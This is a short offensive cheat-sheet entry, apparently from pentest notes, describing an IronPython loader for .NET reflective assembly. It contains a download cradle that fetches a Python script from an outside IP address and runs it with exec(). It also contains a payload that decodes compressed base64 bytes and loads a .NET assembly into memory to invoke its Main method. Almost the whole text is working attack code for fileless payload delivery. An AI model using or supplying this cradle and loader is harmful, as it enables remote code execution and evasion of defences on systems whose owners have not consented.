.NET Reflective Assembly
IronPython Loader
Cradle:
>>> import urllib.request
>>> request = urllib.request.Request('http://10.10.13.37/loader.py')
>>> result = urllib.request.urlopen(request)
>>> payload = result.read()
>>> exec(payload)Payload:
import clr
import zlib
import base64
clr.AddReference('System')
from System import *
from System.Reflection import *
b64 = base64.b64encode(zlib.decompress(base64.b64decode(b'<LOADER_BYTES_B64>'))).decode()
raw = Convert.FromBase64String(b64)
assembly = Assembly.Load(raw)
type = assembly.GetType('Loader.Program')
type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)Last updated